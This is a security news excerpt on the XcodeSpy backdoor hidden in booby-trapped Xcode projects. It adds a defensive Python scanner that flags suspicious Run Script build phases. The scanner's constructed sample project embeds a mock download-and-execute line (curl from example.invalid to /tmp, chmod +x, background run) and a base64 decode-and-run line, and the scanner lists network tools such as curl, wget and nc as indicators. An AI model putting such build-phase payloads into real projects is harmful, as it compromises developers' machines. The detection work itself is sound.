Serious Security: Mac “XcodeSpy” backdoor takes aim at Xcode devs (Security News, March 2021)
The hacked version of Xcode distributed in the XcodeGhost attack would silently add malware to iOS apps when they were compiled on an infected system, without touching the apps' source code at all.
As we said at the time, "Developers with sloppy security practices, such as using illegally-acquired software of unvetted origin for production builds, turned into iOS malware generation factories for the crooks behind XcodeGhost."
The malware is delivered as a booby-trapped version of a legitimate Xcode project, whose name the crooks reused as cover for their own code.
Outbound connections to port 443 are usually TLS web connections, the kind your browser makes when you visit a URL starting https://, so firewalls often let them through without further scrutiny.
Even if the remote shell is only open briefly, that's almost always enough time for the crooks to upload and launch yet more malware on your computer, giving them a beachhead to get back into your system at will, even after the initial remote shell has exited.
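A practical check before building someone else's project is to list every Run Script build phase in its project.pbxproj and look at what the script actually does. The following Python scanner is an added example, not code from the article or from Sophos: it parses the OpenStep-style pbxproj format, decodes each PBXShellScriptBuildPhase's shellScript string, and flags download-and-execute, decode-and-run, and https/port-443 call-home indicators. It assumes that a booby-trapped project hides its payload in a Run Script phase (one common place; the article does not say where XcodeSpy's lives), that the indicator list below is a reasonable starting point, and it runs over a constructed sample project rather than a real one.

```python
import re

# Constructed fragment of an Xcode project.pbxproj (OpenStep plist syntax).
# This is NOT XcodeSpy; it only imitates a trojanised "Run Script" phase
# sitting next to a harmless lint phase and an ordinary sources phase.
SAMPLE_PBXPROJ = r'''
// !$*UTF8*$!
{
    objects = {
        AA0001 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            name = "Run Script";
            shellPath = /bin/sh;
            shellScript = "echo \"Build started\"\nbash -c \"$(echo aGVsbG8= | base64 -d)\"\ncurl -s https://example.invalid:443/u -o /tmp/.x && chmod +x /tmp/.x && /tmp/.x &\n";
        };
        AA0002 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            name = "Lint";
            shellPath = /bin/sh;
            shellScript = "swiftlint lint --quiet\n";
        };
        AA0003 = {
            isa = PBXSourcesBuildPhase;
        };
    };
}
'''

# Hypothetical indicator list (an assumption of this example, tune to taste).
INDICATORS = [
    ("network download", re.compile(r'\b(curl|wget|nc|ncat|nscurl|osascript)\b')),
    ("https / port 443 call-home", re.compile(r'https://|:443\b')),
    ("decode-and-run", re.compile(r'base64\s+(-d|-D|--decode)|\beval\b|bash\s+-c|sh\s+-c|\$\(')),
    ("background launch", re.compile(r'&\s*$|\bnohup\b|\blaunchctl\b', re.M)),
    ("drops executable", re.compile(r'chmod\s+\+?x|/tmp/')),
]


def _iter_objects(text):
    """Yield (object_id, body) for every `ID /* comment */ = { ... };` entry.

    pbxproj object IDs are hex strings; a small brace matcher that skips
    quoted strings (including escaped quotes) finds the end of each body.
    """
    for m in re.finditer(r'\b([0-9A-F]{6,})\s*(?:/\*[^*]*\*/)?\s*=\s*\{', text):
        depth, i, in_str = 1, m.end(), False
        while i < len(text) and depth:
            c = text[i]
            if in_str:
                if c == '\\':
                    i += 1          # skip the escaped character
                elif c == '"':
                    in_str = False
            elif c == '"':
                in_str = True
            elif c == '{':
                depth += 1
            elif c == '}':
                depth -= 1
            i += 1
        yield m.group(1), text[m.end():i - 1]


def decode_pbx_string(s):
    """Turn the backslash escapes Xcode writes into a quoted value back into text."""
    return re.sub(r'\\(.)', lambda m: {'n': '\n', 't': '\t'}.get(m.group(1), m.group(1)), s, flags=re.S)


def scan_pbxproj(text):
    """Return one finding per Run Script phase: id, name, decoded script, matched indicators."""
    findings = []
    for obj_id, body in _iter_objects(text):
        if not re.search(r'\bisa\s*=\s*PBXShellScriptBuildPhase\s*;', body):
            continue
        name_m = re.search(r'\bname\s*=\s*"?([^";]*)"?\s*;', body)
        script_m = re.search(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;', body, re.S)
        script = decode_pbx_string(script_m.group(1)) if script_m else ''
        hits = [label for label, rx in INDICATORS if rx.search(script)]
        findings.append({'id': obj_id, 'name': name_m.group(1) if name_m else '',
                         'script': script, 'indicators': hits})
    return findings


def suspicious_phases(text, min_hits=2):
    """IDs of Run Script phases that trip at least `min_hits` indicators."""
    return [f['id'] for f in scan_pbxproj(text) if len(f['indicators']) >= min_hits]


if __name__ == '__main__':
    for f in scan_pbxproj(SAMPLE_PBXPROJ):
        print(f"{f['id']} ({f['name']}): {', '.join(f['indicators']) or 'no indicators'}")
        for line in f['script'].splitlines():
            print("    " + line)
```

Run it against a real project with `scan_pbxproj(open('App.xcodeproj/project.pbxproj').read())`. Any Run Script phase you did not write deserves reading in full, whether or not it trips an indicator, since a determined attacker will simply avoid the obvious strings.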
The call-home sites in this case are identified by Sophos web filtering products at connection time under the general category PROD COMMAND AND CONTROL and under the security category SEC MALWARE CALLHOME. If you are interested in real-time malware and web filtering and how you can build it into your own products and services, you might like to look at the SophosLabs Intelix APIs.